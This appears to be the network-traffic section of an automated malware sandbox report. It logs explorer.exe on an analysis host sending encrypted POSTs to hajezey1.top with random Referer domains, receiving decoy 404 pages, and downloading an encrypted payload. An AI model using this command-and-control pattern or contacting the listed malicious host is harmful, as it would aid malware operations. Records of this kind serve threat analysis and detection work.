Oct 29, 2021 20:50:04.393836021 CEST	6309	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 18:50:04 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
25	192.168.2.4	49819	185.98.87.159	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 29, 2021 20:50:04.505575895 CEST	6310	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://kfnisufi.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 305 Host: hajezey1.top
Oct 29, 2021 20:50:04.505975962 CEST	6310	OUT	Data Raw: 10 87 86 e3 1a 81 d1 bb b9 36 0d 31 0f b9 e4 f9 35 15 af 32 a2 45 6b eb c8 ee de f6 f3 ae 93 80 11 c4 5c a0 6c 1b c8 e4 9b d8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 93 66 5d 02 c8 a1 c1 64 39 c0 b1 38 Data Ascii: 6152Ek\lwmwu$f]d98&f'uPVea"A6m\|-LGx}TJY$CJ%s($?YSi3S-9>q`&Uu)"^L,0`x\|db2f6>jj\BH
Oct 29, 2021 20:50:04.583762884 CEST	6311	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 18:50:04 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
26	192.168.2.4	49820	185.98.87.159	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 29, 2021 20:50:04.672300100 CEST	6311	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xoynqlbjnc.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 188 Host: hajezey1.top
Oct 29, 2021 20:50:04.672312021 CEST	6312	OUT	Data Raw: 10 87 86 e3 1a 81 d1 bb b9 36 0d 31 0f b9 e4 f9 35 15 af 32 a2 45 6b eb c8 ee de f6 f3 ae 93 80 11 c4 5c a0 6c 1b c8 e4 9b d8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 90 66 5d 02 c8 a1 c1 64 37 89 c2 38 Data Ascii: 6152Ek\lwmwu$f]d782WjpCSrt/V&hkY%t8bP3L a9[mv i+UfkG)baw\|rJ
Oct 29, 2021 20:50:04.751247883 CEST	6312	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 18:50:04 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
27	192.168.2.4	49821	185.98.87.159	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 29, 2021 20:50:04.834038019 CEST	6313	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xwytsoqpb.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 120 Host: hajezey1.top
Oct 29, 2021 20:50:04.834053993 CEST	6313	OUT	Data Raw: 10 87 86 e3 1a 81 d1 bb b9 36 0d 31 0f b9 e4 f9 35 15 af 32 a2 45 6b eb c8 ee de f6 f3 ae 93 80 11 c4 5c a0 6c 1b c8 e4 9b d8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 91 66 5d 02 c8 a1 c1 64 5a 87 b7 03 Data Ascii: 6152Ek\lwmwu$f]dZG20R/W^I\Cikj;dbw
Oct 29, 2021 20:50:04.911092043 CEST	6314	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 18:50:04 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
28	192.168.2.4	49822	185.98.87.159	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 29, 2021 20:50:04.993262053 CEST	6315	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ipaup.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 195 Host: hajezey1.top
Oct 29, 2021 20:50:04.993271112 CEST	6315	OUT	Data Raw: 10 87 86 e3 1a 81 d1 bb b9 36 0d 31 0f b9 e4 f9 35 15 af 32 a2 45 6b eb c8 ee de f6 f3 ae 93 80 11 c4 5c a0 6c 1b c8 e4 9b d8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 8e 66 5d 02 c8 a1 c1 64 48 a2 82 0d Data Ascii: 6152Ek\lwmwu$f]dHYU>c:x<;R<Um{),<&PZGu4m'C`$ZIHI1_5)W/"#kQGc
Oct 29, 2021 20:50:05.073988914 CEST	6316	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 18:50:05 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c 1d 16 4d aa 8f 8c f5 cf 9b 2b 25 9b f6 ba e9 1a b0 1c 07 74 d2 87 9a 87 cd 2b 80 78 51 a1 a2 8f 3c 65 dd 1c e0 32 02 50 08 a8 da e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1d 27 f4 d2 af 34 91 b4 b9 21 80 20 59 55 11 5c 92 86 64 ab 49 11 80 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 85 92 c9 8a 5c d8 06 0e 45 27 11 7d 87 f8 e0 04 89 f9 d4 57 80 90 70 89 ec 9c 48 6b 0e e1 a2 22 48 f2 d0 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 d3 4f 5a 96 da 19 d1 3a 2d ca 41 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 99 84 4a 04 38 8d 7d 14 2c d0 e8 b1 14 1d 73 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 02 43 64 cd 25 5c 8d b7 d7 21 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 f5 6a b7 be 34 56 9b 46 76 99 86 11 00 83 32 42 ea 6f cf ae 04 5d 94 36 e1 48 50 67 35 50 b8 81 be f0 80 de 5b 46 6a 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 57 25 f5 b8 d0 a7 85 62 4a 52 7d 54 7a 08 6c 39 c0 5e f3 5c 19 6d 63 95 be 07 3d da 9a 3e 05 22 7d e6 b2 68 60 bd 10 31 eb cd fc 25 15 8e b7 82 7f 8e 40 b6 f1 47 4e a1 21 84 88 4b 2e 69 81 77 af dd c6 83 41 df 30 ae b8 e8 21 10 a0 57 6e 61 87 bd 77 6a 67 09 0f 8a ef 22 3b 6b 81 c7 86 7a 8e 52 d3 e4 9e 4e 7b d6 7d 00 2c 0f 7a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 3d 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 9b 09 09 a8 00 13 30 7b 88 cc c9 e1 a3 c3 e5 0f 25 93 23 c4 a9 d7 cf 8e 3d 39 dc 46 ba 58 dc be b0 98 3f d8 94 eb 53 43 a1 0c 97 e4 6e 76 f9 14 34 0b 64 82 b2 64 4f 55 e0 ca 5e c3 bd c0 88 0b 54 d9 1d 69 7a de ff 3d e1 03 70 2e 1f f4 d4 6a a9 a9 16 da 68 22 bd c8 cb cf 3f ef c8 a9 a6 cc d5 02 47 71 98 66 3c 3d f8 bf cb 67 3f d8 97 24 a9 b9 fc f0 ba e8 57 2d c8 a1 11 19 af 7b 69 ad 72 5b 80 1c 97 36 db 64 11 82 f5 51 aa 3b c5 da a7 f1 7d 87 02 f3 35 43 25 11 00 ac 49 1d 02 a1 b7 28 e4 f0 f7 11 41 a6 a4 87 35 ce 19 c3 ce 85 d5 3a 94 d4 1b e4 2f 62 f1 22 27 c6 99 0a d7 d9 76 c5 89 10 c1 8b ba 97 28 35 bd a8 8f 59 9d 9b cf d5 f5 de 35 1f 98 92 f2 b2 6a 05 85 85 0a 9f 12 6f 03 62 53 b5 f8 80 99 8b 84 80 7f 1d b8 78 c0 b4 a7 a4 d0 91 46 e8 81 2f 0d 4d 76 00 94 23 c7 8e 07 e8 df 4a 17 7a 8d 42 14 7e 26 a0 81 ba 07 47 7d bb fb ce 3b 33 f0 82 6c 27 b4 e3 e4 ce 70 68 98 3b 6a fe da 3d b3 f5 3f 78 81 42 7b f9 e8 f0 85 a5 46 e5 Data Ascii: 1f66S(SW\/iP"&&grq\|6?eIJ5~/ar"`g1Q5ih.Kw:i/+".]pW!RY8\|M+%t+xQ<e2P0YObyT=a'4! YU\dIXKg[Ge92)g z6\E'}WpHk"HI?o\|6NI[LeU[0z;+W~5=PVpGZlqV@q!UvyOZ:-A%GkKm@NQ>[J8},s"JG0Z"?kQTJMQCd%\!&Q#F<pvA>C/CbGBj4VFv2Bo]6HPg5P[Fj6'NGc_,/DO9W%bJR}Tzl9^\mc=>"}h`1%@GN!K.iwA0!Wnawjg";kzRN{},zHB(yw+;5lo?hs#9Acw9kwN7&,XwlH%f4-ow^7Hg7;=g&9c0{%#=9FX?SCnv4ddOU^Tiz=p.jh"?Gqf<=g?$W-{ir[6dQ;}5C%I(A5:/b"'v(5Y5jobSxF/Mv#JzB~&G};3l'ph;j=?xB{F
Oct 29, 2021 20:50:05.074019909 CEST	6318	IN	Data Raw: bb 63 eb 97 62 c6 70 d9 31 d3 48 45 72 08 8e c1 6c c4 f3 bc f0 be bf 3e 00 d0 6f 88 05 42 76 8c 9e 94 74 8d 47 41 99 84 05 8c e3 ec 9c 6d 56 30 c8 35 61 dd a7 36 09 c7 3e 76 f3 6b df c8 a7 d3 71 5d 03 45 3b e9 b4 15 54 57 70 3b 8b 38 7c e0 b5 55 Data Ascii: cbp1HErl>oBvtGAmV05a6>vkq]E;TWp;8\|UfG3Q2 !Sj^OM-GIKUtJYAVl>\|5F)s_S3kD--(X!+]1B#&;mW>=H\|a0//1
Oct 29, 2021 20:50:05.074035883 CEST	6319	IN	Data Raw: 67 72 b1 90 17 d6 13 88 bd 8c 88 a4 cb 39 fc d0 f6 a4 6d cb 7d 7b df 3e 86 59 15 7c ce b7 a2 a0 6c a8 1c 94 53 5a 61 5f 29 c9 f9 dc 9b 27 58 b8 ad 7c 0a 9e 68 fa 03 2f dc ec 5c ee a5 9e b6 77 b2 62 c1 2a 6a ac a6 cd 97 a8 c1 13 f4 6c 81 c2 eb 98 Data Ascii: gr9m}{>Y\|lSZa_)'X\|h/\wbjl]_L4Yx}ZnQ.C6{N[-n~52bg}MH>OuR>#AZDsC_kT\1zu@.r)7:R>qS=#
Oct 29, 2021 20:50:05.074053049 CEST	6320	IN	Data Raw: 83 da e5 3c 8a 86 60 07 42 99 7d 83 3d 9b f5 8d 3f e3 1e 40 8f 85 58 4b 44 80 02 ce a3 a7 bf 09 df 10 66 b8 c7 fc 3d 17 cd b2 b3 fd 67 6c fa 88 6c 20 09 9e 59 a6 56 69 b7 7a b1 6a df 1c 85 da 9c f1 61 6f 47 04 72 78 87 dd 84 2b b8 b4 c9 8d 24 47 Data Ascii: <`B}=?@XKDf=gll YVizjaoGrx+$GRTv!8IXf,W0:FJpSz)%$%^:{-u@[l{4[`VSr&FjWh:!v #N:<Id,b7)di( nUM
Oct 29, 2021 20:50:05.074068069 CEST	6322	IN	Data Raw: 88 66 53 73 4c 6e 1c 51 61 2f d0 47 c6 77 4d 13 ae f7 53 ee db 7b a2 dd d3 48 75 78 ed 87 0a 3c 84 b5 b9 29 4d 31 e0 d5 d4 a9 d1 a2 00 40 42 94 be 8b 03 68 5a bf 2e d9 6d e5 66 21 25 16 d9 3e 11 b2 dd 07 6d 7e 03 7b a5 52 5a 0e f6 0c 87 ec 40 92 Data Ascii: fSsLnQa/GwMS{Hux<)M1@BhZ.mf!%>m~{RZ@d+Uu)7`\|QME{Qj.x}/xbF2Q QQv$P,fpUuq?q5]+2o>l*K_$m ?\a?L >yG7GUw#=Q{(ivxf&;t
Oct 29, 2021 20:50:05.074081898 CEST	6323	IN	Data Raw: 80 27 9f 37 91 e3 fd 60 4f b6 2a 52 e0 09 d6 35 74 c1 3a fa e4 ce 8d a1 b6 00 e2 5f f4 4e c1 ed 5e f9 e2 29 67 27 fc f2 22 05 4e d8 13 cf 85 06 f7 98 cc 49 2c 8e 7a e9 4d 2f f2 3c 00 c3 aa 8a 2b d3 c9 09 d1 f9 b0 3c 59 e4 84 6b 18 29 ed fd 09 7f Data Ascii: '7`OR5t:_N^)g'"NI,zM/<+<Yk)xfOg.kQ;OZ!tBQ,!4S'v$>v9gUzS`Hgl'L_6r tJIs#+7im:tRih8V"Gmkn[#`xT5NIs
Oct 29, 2021 20:50:05.074249983 CEST	6325	IN	Data Raw: 47 7b 94 d2 a3 49 39 98 48 a1 db fb 87 cf 2c a5 4d cd 83 82 13 a7 1e e1 19 80 32 7a 5c 85 06 7a c4 53 e5 bb a6 dc 19 71 c4 4c c5 3b 59 cd 78 23 89 f5 11 db c8 79 8f 57 07 37 55 df 58 c5 4e 13 8d cf c4 0c c1 9b 4b e3 7d 5c 65 77 66 38 47 d3 96 14 Data Ascii: G{I9H,M2z\zSqL;Yx#yW7UXNK}\ewf8Gg=sRk_7-9YHH<I4:RqGM<ZLWggR'3uB'$@HE8Y}]jmv?2000vS`;Ao@%g647;jk%jK/df-
Oct 29, 2021 20:50:05.074268103 CEST	6326	IN	Data Raw: a8 06 0c e8 7f 36 2e 98 7b a6 bb 34 16 c6 71 81 b3 8c 7e 38 23 52 07 70 1d 15 bc d6 21 37 6e 61 71 d1 c1 b9 f7 0a d1 c6 ac d8 54 c3 92 ae 30 5a 93 7a 14 2f 14 d2 e3 94 97 a7 57 57 be c0 57 8e 85 63 f2 13 5b ca 4a a1 67 45 38 ae d8 46 8c c3 68 bc Data Ascii: 6.{4q~8#Rp!7naqT0Zz/WWWc[JgE8FhsW-\SpH:.Zzzom,xnX_Bz=:l!<Wp@FK.+lcig$h{)0"Dq/WH/`v8`w:4%0dD
Oct 29, 2021 20:50:05.074284077 CEST	6327	IN	Data Raw: 70 ce b3 a6 39 32 dd 00 07 3f 66 02 14 f0 4c c0 cf 32 e1 ce d2 7b 3b 20 56 75 1a d6 bb f9 b8 4a cc 24 c1 13 36 d5 51 be 59 70 57 e6 64 52 e8 49 62 29 08 16 28 83 34 bd 3d 1e 0b 15 29 23 be 63 04 b7 49 22 1c 7e 11 10 de d6 03 09 3d dc 23 c0 74 73 Data Ascii: p92?fL2{; VuJ$6QYpWdRIb)(4=)#cI"~=#tss$)xHu&A vg4g{E?2{)7fteL}m z8+T\|FG(o:'?:7r3C_%XF-jzH/J`b9rOTF571
Oct 29, 2021 20:50:05.074301004 CEST	6329	IN	Data Raw: 31 f2 33 fb 35 91 c2 26 81 b9 85 6a ea 51 c7 c4 33 2d c7 28 11 6d 66 c7 fc d0 aa af 2a 01 d7 35 41 a6 e3 db f4 0b 35 10 a6 3a f4 09 88 6f 6f 60 2e e0 0f f1 81 1b 1f 65 64 b7 e4 2a 10 f2 d2 5c e2 3d 42 7f cb 42 14 63 02 e7 b5 90 1b 4c 3f 8e 8e 3f Data Ascii: 135&jQ3-(mf5A5:oo`.ed\=BBcL??IQd=b02]dvQ[$'] P\rg9@L(pnD}eAl0WoZ#k"}y$`Bo>>Rro2W,.E~T$xuu]]:LS=q
Oct 29, 2021 20:50:05.125459909 CEST	6330	IN	Data Raw: 6b af 3a 79 b9 22 99 bd e3 07 b4 23 e8 8a bd ef bf 8c 1a 3e 42 ea 05 00 31 40 aa f7 d1 aa 29 57 70 33 61 b0 ec ea 9d 46 0a 33 e7 80 a7 54 f7 a5 91 dc b1 4c 05 85 39 df c3 75 48 af 6c fc 82 8a 6b 52 77 21 c3 6c e5 c9 32 98 75 10 74 85 e7 8f 19 8a Data Ascii: k:y"#>B1@)Wp3aF3TL9uHlkRw!l2utY'%voA2f/,;zpG7_gxb<ASp>U7Y,9f1O ^"@&(7Nqw#Fn`0/};%*Pt^

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
29	192.168.2.4	49826	185.98.87.159	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 29, 2021 20:50:06.782704115 CEST	6489	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://etkxss.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 233 Host: hajezey1.top
Oct 29, 2021 20:50:06.782725096 CEST	6489	OUT	Data Raw: 10 87 86 e3 1a 81 d1 bb b9 36 0d 31 0f b9 e4 f9 35 15 af 32 a2 45 6b eb c8 ee de f6 f3 ae 93 80 11 c4 5c a0 6c 1b c8 e4 9b d8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 84 de 8e 66 5d 02 c9 a1 c1 64 40 90 d9 2d Data Ascii: 6152Ek\lwmwu$f]d@-e}[X:/e_avy;3eZVFl#[Alf:p}D9'H\'<z"=\qrb0k!gUAq5CG6^uFLqNB$}p*
